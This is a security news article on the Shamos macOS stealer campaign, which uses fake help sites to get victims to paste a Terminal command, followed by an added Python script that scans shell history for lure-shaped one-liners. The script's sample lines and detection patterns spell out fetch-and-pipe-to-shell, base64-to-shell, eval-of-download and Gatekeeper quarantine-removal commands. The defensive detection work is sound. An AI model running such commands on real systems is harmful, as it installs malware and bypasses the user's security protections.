Shamos malware: 1 Command Steals Mac Data via Gatekeeper


A new global campaign by the group COOKIE SPIDER is targeting Mac users with Shamos malware, an Atomic macOS Stealer variant that steals data by tricking users into running a terminal command.

Deceptive Atomic macOS Stealer Terminal Command

The attack uses a “ClickFix” tactic, luring victims with malvertising and spoofed tech help sites. These fake sites, with domains like mac-safer[.]com, appear in search results for common Mac issues such as “how to flush resolver cache.”

Victims are then convinced to copy and paste a one-line command into their Mac’s Terminal application. This action downloads and executes the malware directly, bypassing many built-in security protections.

Understanding the Threat of Shamos Malware

The Shamos malware is a new variant of the well-known Atomic macOS Stealer (AMOS). The cybercriminal group identified as COOKIE SPIDER is responsible for its development and distribution.

Once installed, the malware is designed to steal sensitive information from the infected device. It specifically targets Apple Notes, Keychain items, browser passwords, and cryptocurrency wallets for theft.

The stolen data is then sent to attacker-controlled servers. In some cases, the COOKIE SPIDER Shamos attack also delivers additional payloads, such as botnet modules or fake Ledger wallet applications, and can install persistence tools to restart with the system.

Executing a macOS Gatekeeper Bypass

The malicious one-line command is specifically crafted to achieve a macOS Gatekeeper bypass. This allows the unverified software to run without triggering the standard security prompts users would normally see.
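The two paragraphs above describe the core of the lure: a victim pastes a one-liner that fetches and runs the payload and sidesteps Gatekeeper. From a defender's side, the most direct artifact of such an attack is the command itself in the user's shell history. The following script is an added example, not code from the article or from any vendor it cites; it scans zsh or bash history for command shapes typical of "paste this into Terminal" lures (remote fetch piped into a shell, base64-decoded content piped into a shell, removal of the quarantine attribute, eval of downloaded text). The indicator patterns and the sample history lines are constructed for illustration and are assumptions, not indicators published for this campaign.

```python
"""Scan macOS shell history for ClickFix-style one-liners.

Added example (not from the article). The regexes below are generic
assumptions about how "paste into Terminal" lures look, not indicators
tied to the Shamos campaign; tune them for your environment.
"""
import re
import sys
from typing import Dict, Iterable, List

# Assumed indicator patterns for suspicious one-liners.
INDICATORS: Dict[str, re.Pattern] = {
    # curl/wget output piped straight into sh/bash/zsh
    "remote_fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # base64-decoded blob piped into a shell
    "encoded_payload_to_shell": re.compile(
        r"base64\s+(-d|--decode|-D)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # stripping the quarantine flag so Gatekeeper is never consulted
    "quarantine_attr_removal": re.compile(
        r"\bxattr\b.*(-d\s+com\.apple\.quarantine|-c\b)"),
    # eval of content fetched at runtime
    "eval_of_fetched_content": re.compile(
        r"\beval\b.*\$\(\s*(curl|wget)\b"),
}

# zsh extended history prefixes commands with ": <epoch>:<elapsed>;"
ZSH_EXT = re.compile(r"^: \d+:\d+;")

# Constructed sample history: a mix of legitimate admin commands and lures.
SAMPLE_HISTORY: List[str] = [
    "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",
    "ls -la ~/Library/LaunchAgents",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "xattr -d com.apple.quarantine ~/Downloads/Helper.app",
    'eval "$(curl -s https://example.invalid/run)"',
    "git clone https://github.com/example/example-tool.git",
    "brew install wget",
]


def parse_history_lines(raw_lines: Iterable[str]) -> List[str]:
    """Normalise history lines: strip zsh metadata and drop blanks."""
    out = []
    for raw in raw_lines:
        line = ZSH_EXT.sub("", raw.rstrip("\n"))
        if line.strip():
            out.append(line)
    return out


def load_history(path: str) -> List[str]:
    """Read ~/.zsh_history or ~/.bash_history into a clean list of commands."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return parse_history_lines(fh)


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per command that matches at least one indicator."""
    hits = []
    for line_no, command in enumerate(lines, start=1):
        matched = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if matched:
            hits.append({"line_no": line_no, "command": command,
                         "indicators": matched})
    return hits


if __name__ == "__main__":
    # Usage: python scan_history.py [~/.zsh_history]; defaults to the sample.
    history = load_history(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_HISTORY
    for hit in scan_history(history):
        print(f"line {hit['line_no']}: {', '.join(hit['indicators'])}")
        print(f"    {hit['command']}")
```

Run against the built-in sample, the script flags the four lure-shaped lines and leaves the legitimate DNS-flush, `ls`, `git clone` and `brew` commands alone. The same logic ports directly to an EDR process-creation rule keyed on the Terminal parent process; history scanning is useful for triage after the fact, but it misses commands run in sessions that had history disabled.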

Attackers also use fake GitHub repositories to spread the malware. They clone popular applications and tools, hiding the malicious code within repositories that appear legitimate to unsuspecting users.

How to Remove Shamos from Mac and Stay Safe

Users should never execute a terminal command from a website or forum unless they are an advanced user who fully understands its function. Always verify troubleshooting steps on Apple’s official support site or trusted community forums.

Exercise caution with sponsored ads in search results and stick to verified sources for technical help. When downloading from GitHub, always check the publisher’s name, activity history, and the repository’s reputation.

Keeping macOS up to date with automatic updates enabled is a critical step in patching vulnerabilities. For an additional layer of defense, security experts recommend installing a strong antivirus program.
